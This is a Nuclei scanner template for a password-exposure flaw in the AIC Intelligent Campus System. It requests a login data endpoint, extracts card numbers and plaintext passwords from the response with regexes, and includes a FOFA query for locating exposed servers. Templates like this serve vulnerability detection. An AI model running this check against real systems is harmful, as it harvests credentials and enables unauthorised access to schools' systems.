39 lines
920 B
YAML
Executable File
39 lines
920 B
YAML
Executable File
id: aic-intelligent-password-exposure
|
|
|
|
info:
|
|
name: AIC Intelligent Campus System - Password Exposure
|
|
author: SleepingBag945
|
|
severity: medium
|
|
description: |
|
|
Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br>
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: title="AIC智能校园系统"
|
|
tags: aic,exposure,password
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/datacenter/dataOrigin.ashx?c=login"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200 && contains(body_1,"卡号\":\"") && contains(body_1,"密码\":\"")'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: username
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- "\"卡号\":\"(.*?)\""
|
|
|
|
- type: regex
|
|
name: passwd
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- "\"密码\":\"(.*?)\""
|